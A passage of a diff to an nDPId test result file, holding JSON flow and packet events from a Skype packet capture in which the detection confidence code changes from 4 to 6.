00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1431969684467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969684467,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8hr8AAEAReCLAqAEib91KKDLdnFIAKIqNnHoCPuiFRI7wAmsXvw\/hsEg3lYrpYaj71nbGjF\/D9YI="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1072,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1431969684539,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969684539,"pkt":"0NQSxnP1PBXCt3IOCABFAABLqeAAAEARTU7AqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1073,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":2,"flow_last_seen":1431969684539,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969684539,"pkt":"0NQSxnP1PBXCt3IOCABFAABLQlQAAEARtNrAqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685111,"flow_last_seen":1431969685111,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969685111,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -635,40 +635,40 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1431969685234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969685234,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0w75AAEAGlVnAqAEinTeCqsOYAbvnclCkz\/tu9oAQECyACwAAAQEICj4jMf1Oqgmy"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1431969685483,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969685483,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9kPYAAEARbgbAqAEib91KDDLdnF8AKfx\/nHwCoMStpaQYl8DnkwYEqqAF9FXdbHxKRUYHrOVyJRT4"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1094,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1431969685483,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969685483,"pkt":"0NQSxnP1PBXCt3IOCABFAABAc7wAAEARJVPAqAEinTeCnDLdnGIALEvBnH4CZ\/Wwkka3Pn+XJ2UB3JhFKbNG53SJ0IkPRrwOiZA6M572"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1094,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1094,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969685484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1431969685484,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969685484,"pkt":"0NQSxnP1PBXCt3IOCABFAAA72\/8AAEARIuzAqAEib91KHzLdnFUAJxsjnIACakgRW6zNH9umAy\/xnD4EBConFfeCu32RWyeo5A=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1095,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969685484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1095,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969685484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":3,"flow_last_seen":1431969685579,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969685579,"pkt":"0NQSxnP1PBXCt3IOCABFAABLzugAAEARKEbAqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":3,"flow_last_seen":1431969685579,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969685579,"pkt":"0NQSxnP1PBXCt3IOCABFAABLSKwAAEARroLAqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1114,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1431969686494,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969686494,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7KdYAAEAR1RfAqAEib91KHTLdnFgAJyRCnIIC1fLHUFbyfUuPJFSEHOCi7XP7hf4fCpbSA7AYcw=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1114,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1114,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1115,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1431969686494,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969686494,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+wC0AAEAR2OzAqAEinTeCkzLdnFMAKhU5nIQCbtjtgTR5b1SpAOgeT3hZ1sNas6z5WpsHwiEzG2Fdeg=="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 01122{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1431969686726,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969686726,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAIS0J4AAEAR5nLAqAEi\/\/\/\/\/0RcRFwB\/vqceyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 01118{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1431969686726,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969686726,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISl+cAAEARXILAqAEiwKgB\/0RcRFwB\/jf1eyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 01123{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1431969686992,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969686992,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISTt8AAEARZ\/jAqAFc\/\/\/\/\/0RcRFwB\/v9VeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 01118{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1431969686993,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969686993,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISzasAAEARJoTAqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1431969687504,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969687504,"pkt":"0NQSxnP1PBXCt3IOCABFAABBxOwAAEARHhbAqAEinTc4qDLdnEYALROCnIYCHY\/YUYokwK99l51ViNrnwr9nS0r47IMjMyFmHPRTFPvIVw=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1128,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1128,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": 